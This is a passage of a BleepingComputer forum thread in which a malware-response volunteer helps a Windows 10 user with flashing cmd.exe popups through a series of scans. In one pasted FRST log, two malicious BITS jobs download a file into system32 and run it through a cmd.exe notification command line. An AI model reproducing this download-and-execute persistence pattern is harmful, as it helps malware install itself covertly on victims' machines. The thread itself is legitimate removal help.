Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows 10: \system32\cmd.exe prompt flashing


  • This topic is locked This topic is locked
37 replies to this topic

#16 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 12 November 2016 - 07:32 PM

Hi Pranav,

 

Thanks for the clarification! Although there was still some slight differences of wording in the advanced settings of the ESET scan. Here are the settings I enabled:

 

a8RDDON.png

 

Here are the results of the scan, 3 threats were found:

 

D:\MyDownloads\ccsetup523.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted
D:\MyDownloads\spsetup128.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted
D:\Program Files HD\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.bat    BAT/StartPage.NHU trojan    cleaned by deleting
 

Thanks again!



BC AdBot (Login to Remove)

 


#17 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 15 November 2016 - 08:51 AM

Greetings Ollyoxen ^_^,
 
 
96jfrSi.png Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
 
 
Are you still seeing the popups?
 
-Pranav

Edited by blueelvis, 15 November 2016 - 08:52 AM.

Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#18 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 15 November 2016 - 03:40 PM

Hello again, Pranav!

 

I ran JRT as requested and it says it removed 2 files. However, I am still receiving popups. Here is the txt file:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 10 Home x64
Ran by Johnsory (Administrator) on Tue 11/15/2016 at 11:36:49.58
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 2

Successfully deleted: C:\Users\Johnsory\AppData\Local\crashrpt (Folder)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARNOTIFIER.EXE-969E73DB.pf (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 11/15/2016 at 11:38:10.78
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 



#19 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 18 November 2016 - 02:50 PM

Hi ollyoxen ^_^,

 

The JRT log is good. Now, since the popups are still happening, I would like you to try and boot the machine in a clean boot environment.

 

Before we proceed ahead, I would like you to create a system restore point using the following guide -

http://www.groovypost.com/howto/windows-10-enable-create-system-restore/

 

Once you have created a system restore point, please follow the following guide to boot the system in a clean way -

http://www.thewindowsclub.com/what-is-clean-boot-state-in-windows

 

 

Let me know if you are still seeing any popups in this mode.

 

 

Have a nice day!

 

Regards,

Pranav


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#20 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 23 November 2016 - 02:07 AM

Hi Pranav!

 

I have followed your steps and upon restarting in a clean boot environment, I didn't notice the pop ups immediately after logging in. However, an hour later, they are still occurring.

 

Should I re-enable all of the non Microsoft services now?

 

l9OnlSO.png



#21 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 27 November 2016 - 09:53 AM

Greetings Ollyoxen ^_^,
 
Really sorry about the delay. I was under the burden of assignments. 
 
 
 
Please download aswMBR ( 4.5MB ) to your desktop.
  • Double click the aswMBR.exe icon, and click Run.
  • When asked if you'd like to "download the latest Avast! virus definitions", click Yes.
  • Click the Scan button to start the scan.
  • On completion of the scan, click the save log button, save it to your desktop, then copy and paste it in your next reply.
 
 
Once you are done with the scan, please run RKill according to the following guide -
 

 Please download Rkill by Grinler and save it to your desktop.
  • Link 1
  • Link 2
    • Double-click on the Rkill desktop icon to run the tool.
    • If using Vista/Windows7, right-click on it and Run As Administrator.
    • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
    • If not, delete the file, then download and use the one provided in Link 2.
    • If it does not work, repeat the process and attempt to use one of the remaining links until the tool runs.
    • If the tool does not run from any of the links provided, please let me know.
  • Do not reboot the computer, you will need to run the application again.
Once you have run RKill, just let the computer run and see if you still the popups every hour or not.
 
 
Have a nice day!
 
-Pranav

Edited by blueelvis, 27 November 2016 - 09:54 AM.

Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#22 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 01 December 2016 - 04:15 PM

Hey Ollyoxen ^_^,

 

It has been 4 days since my last response. Are you still with me?

 

 

 

-Pranav


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#23 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 01 December 2016 - 09:45 PM

Hey Pranav,

 

Sorry I'm getting back to you so late. When attempting to run aswMBR, I am not given the option to "download the latest Avast! virus definitions" I am only given this option before the program pops up

 

VhaBmkU.png

 

The program looks like this to me:

 

DwmPyOm.png

 

What do you recommend?



#24 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 02 December 2016 - 01:56 AM

Hi again Pranav,

 

For some reason today the pop ups are appearing for longer periods of time than before. I managed to capture what the text in the command box says (same for both of the boxes):

 

MNYL7Qv.png

 

I should mention that what appears in the front box is all it writes before closing. The second command box behind the first one simply writes the same two lines at the end of the first one before closing as well.

 

What do you make of it?

 

*EDIT* when booting my computer again for the first time after the slower pop-ups there was a message saying "Scanning and repairing drive (:C)" which is where I have my operating system downloaded to.


Edited by ollyoxen, 02 December 2016 - 04:10 PM.


#25 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 04 December 2016 - 08:26 AM

Hey Pranav,

 

Sorry I'm getting back to you so late. When attempting to run aswMBR, I am not given the option to "download the latest Avast! virus definitions" I am only given this option before the program pops up

 

VhaBmkU.png

 

The program looks like this to me:

 

DwmPyOm.png

 

What do you recommend?

Click on YES and continue :)

Please paste the log files with your next reply.

 

Hi again Pranav,

 

For some reason today the pop ups are appearing for longer periods of time than before. I managed to capture what the text in the command box says (same for both of the boxes):

 

MNYL7Qv.png

 

I should mention that what appears in the front box is all it writes before closing. The second command box behind the first one simply writes the same two lines at the end of the first one before closing as well.

 

What do you make of it?

 

*EDIT* when booting my computer again for the first time after the slower pop-ups there was a message saying "Scanning and repairing drive (:C)" which is where I have my operating system downloaded to.

That's a lot of information!

 

I am discussing this with my instructor to remedy this :)

 

Have a nice day!

 

 

-Pranav


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#26 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 04 December 2016 - 01:07 PM

Greetings Ollyoxen ^_^,

 

Fantastic work on those popups! The below fix should help us in determining what is causing the problem.

 

 

 

Download attached fixlist.txt file and save it to the Desktop.
 
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
 
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
 
Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
Have a nice day!
 
Regards,
Pranav

Attached Files


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#27 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 04 December 2016 - 05:26 PM

Hello Pranav!

 

Hope you are doing well. I've pasted the aswMBR, Rkill, and FRST logs below:

 

aswMBR log

 

aswMBR version 1.0.1.2290 Copyright© 2014 AVAST Software
Run date: 2016-12-04 13:23:29
-----------------------------
13:23:29.006    OS Version: Windows x64 6.2.9200
13:23:29.007    Number of processors: 4 586 0x3C03
13:23:29.007    ComputerName: JOHNSORY-PC  UserName: Johnsory
13:23:29.186    Initialize success
13:23:29.194    VM: initialized successfully
13:23:29.195    VM: Intel CPU supported virtualized
13:23:31.062    VM: disk I/O storahci.sys
13:23:38.733    AVAST engine defs: 16120100
13:23:59.600    Disk 0  \Device\Harddisk0\DR0 -> \Device\00000035
13:23:59.602    Disk 0 Vendor: ST1000DM003-1ER162 CC45 Size: 953869MB BusType: 11
13:23:59.604    Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\00000036
13:23:59.609    Disk 1 Vendor: CT250BX100SSD1 MU01 Size: 238475MB BusType: 11
13:23:59.616    Disk 1 MBR read successfully
13:23:59.617    Disk 1 MBR scan
13:23:59.620    Disk 1 Windows 7 default MBR code
13:23:59.622    Disk 1 Partition 1 00     07      HPFS/NTFS NTFS       238023 MB offset 2048
13:23:59.624    Disk 1 Partition 2 00     27 Hidden NTFS WinRE NTFS          450 MB offset 487473152
13:23:59.633    Disk 1 scanning C:\WINDOWS\system32\drivers
13:24:02.148    Service scanning
13:24:07.889    Modules scanning
13:24:07.893    Disk 1 trace - called modules:
13:24:07.900    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys storahci.sys hal.dll
13:24:07.903    1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xffffac021a7ce060]
13:24:07.906    3 CLASSPNP.SYS[fffff80170c05efb] -> nt!IofCallDriver -> [0xffffac0219c86d90]
13:24:07.914    5 ACPI.sys[fffff8016fc04571] -> nt!IofCallDriver -> [0xffffac0219c85bd0]
13:24:07.917    7 ACPI.sys[fffff8016fc04571] -> nt!IofCallDriver -> \Device\00000036[0xffffac0219c81060]
13:24:08.046    AVAST engine scan C:\WINDOWS
13:24:08.363    AVAST engine scan C:\WINDOWS\system32
13:24:55.077    AVAST engine scan C:\WINDOWS\system32\drivers
13:24:58.276    AVAST engine scan C:\Users\Johnsory
13:25:37.407    AVAST engine scan C:\ProgramData
13:25:48.342    Disk 1 statistics 5233376/0/0 @ 58.62 MB/s
13:25:48.347    Scan finished successfully
13:26:00.063    Disk 1 MBR has been saved successfully to "C:\Users\Johnsory\Desktop\MBR.dat"
13:26:00.066    The log file has been saved successfully to "C:\Users\Johnsory\Desktop\aswMBR.txt"

Rkill log

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2016 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 12/04/2016 01:28:29 PM in x64 mode.
Windows Version: Windows 10 Home

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

 * gagp30kx [Missing Service]
 * IEEtwCollectorService [Missing Service]
 * IoQos [Missing Service]
 * nv_agp [Missing Service]
 * TimeBroker [Missing Service]
 * uagp35 [Missing Service]
 * uliagpkx [Missing Service]
 * WcsPlugInService [Missing Service]
 * wpcfltr [Missing Service]
 * WSService [Missing Service]

 * agp440 [Missing ImagePath]

 * AJRouter => %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted [Incorrect ImagePath]
 * WpnService => %systemroot%\system32\svchost.exe -k netsvcs [Incorrect ImagePath]

 * vmicrdv => %SystemRoot%\System32\icsvcext.dll [Incorrect ServiceDLL]
 * vmicvss => %SystemRoot%\System32\icsvcext.dll [Incorrect ServiceDLL]

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 12/04/2016 01:28:41 PM
Execution time: 0 hours(s), 0 minute(s), and 11 seconds(s)
 

FRST fixlog

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 04-12-2016
Ran by Johnsory (04-12-2016 14:22:57) Run:4
Running from C:\Users\Johnsory\Desktop
Loaded Profiles: Johnsory (Available Profiles: Johnsory & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CMD: bitsadmin /list /allusers /verbose
*****************


========= bitsadmin /list /allusers /verbose =========


BITSADMIN version 3.0
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

GUID: {C0BDA965-EEDD-446A-AB88-782F89FF11C9} DISPLAY: 'task3'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: Johnsory-PC\Johnsory
PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 436736 / 436736
CREATION TIME: 10/22/2016 12:35:29 AM MODIFICATION TIME: 10/22/2016 4:56:20 PM
COMPLETION TIME: 10/22/2016 4:56:20 PM ACL FLAGS:
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 1
RETRY DELAY: 3600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 20
PROXY USAGE: PRECONFIG PROXY LIST: NULL PROXY BYPASS LIST: NULL
DESCRIPTION:
JOB FILES:
    436736 / 436736 WORKING https://dk5gckyelnxjl.cloudfront.net/c6.ashx?s=gamzftptn095001au,c4949605-7b29-470f-9b01-0666903a9c97, -> C:\WINDOWS\system32\bi3.exe
NOTIFICATION COMMAND LINE: 'C:\WINDOWS\system32\cmd.exe' ' /C C:\WINDOWS\system32\bitsadmin.exe /COMPLETE task3 && C:\WINDOWS\system32\bi3.exe /sparam=gamzftptn095001au,c4949605-7b29-470f-9b01-0666903a9c97, /rnd=0 2>nul'
owner MIC integrity level: HIGH
owner elevated ?           true

Peercaching flags
     Enable download from peers      :false
     Enable serving to peers         :false

CUSTOM HEADERS: NULL

GUID: {E008BCDF-6FFD-443B-A237-314CA00DF6A2} DISPLAY: 'task3'
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: Johnsory-PC\Johnsory
PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 436736 / 436736
CREATION TIME: 10/22/2016 12:35:30 AM MODIFICATION TIME: 10/22/2016 4:56:19 PM
COMPLETION TIME: 10/22/2016 4:56:19 PM ACL FLAGS:
NOTIFY INTERFACE: UNREGISTERED NOTIFICATION FLAGS: 1
RETRY DELAY: 3600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 20
PROXY USAGE: PRECONFIG PROXY LIST: NULL PROXY BYPASS LIST: NULL
DESCRIPTION:
JOB FILES:
    436736 / 436736 WORKING https://dk5gckyelnxjl.cloudfront.net/c6.ashx?s=gamzftpbl0cshmoau,f596b095-a37e-4cb5-9b63-18501afea0d1, -> C:\WINDOWS\system32\bi3.exe
NOTIFICATION COMMAND LINE: 'C:\WINDOWS\system32\cmd.exe' ' /C C:\WINDOWS\system32\bitsadmin.exe /COMPLETE task3 && C:\WINDOWS\system32\bi3.exe /sparam=gamzftpbl0cshmoau,f596b095-a37e-4cb5-9b63-18501afea0d1, /rnd=0 2>nul'
owner MIC integrity level: HIGH
owner elevated ?           true

Peercaching flags
     Enable download from peers      :false
     Enable serving to peers         :false

CUSTOM HEADERS: NULL

Listed 2 job(s).

========= End of CMD: =========


==== End of Fixlog 14:22:58 ====



#28 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 08 December 2016 - 06:06 AM

Greetings Ollyoxen ^_^,

 

 

Thanks a lot for the logs. That's a lot of information! Please expect a reply from my side with further instructions within few hours :)

 

 

Have a nice day!

 

Regards,

Pranav


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#29 blueelvis

blueelvis

    Bleep Blop Bleep


  • Malware Response Team
  • 1,666 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:09:18 AM

Posted 10 December 2016 - 02:29 AM

Hey Ollyoxen ^_^,

 

 

Hey Ollyoxen ^_^,

 

 

Thanks a lot for the information. 

 

Please go to http://virscan.org
Browse to the following file path in the "C:\WINDOWS\system32\bi3.exe" field on the top of the page:
 
 
Click on the Upload button
If a pop-up appears saying the file has been scanned already, please select the ReScan button.
Once the Scan is completed, click on the "Copy to Clipboard" button. This will copy the link of the report into the 
Clipboard.
Paste the contents of the Clipboard in your next reply.
 
 
 

Download attached fixlist.txt file and save it to the Desktop.
 
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
 
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
 
Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
Have a nice day!
 
 
Regards,
Pranav

Attached Files


Member of the Bleeping Computer A.I.I. early response team!


In case I have been helping you and you haven't received a reply from me in 48 hours, please feel free to PM me. Anything else? Still feel free to PM me :)

Did you read this? http://omgdebugging.com/5-tips-for-getting-the-best-bang-for-the-buck-at-fast-food-joints/

#30 ollyoxen

ollyoxen
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:07:48 PM

Posted 11 December 2016 - 05:37 AM

Hey there, Pranav!

 

When navigating my system 32 folder, I am unable to locate bi3.exe inside. Here is what I see:

 

VLMC5YD.png

 

Am I looking in the right place?






1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users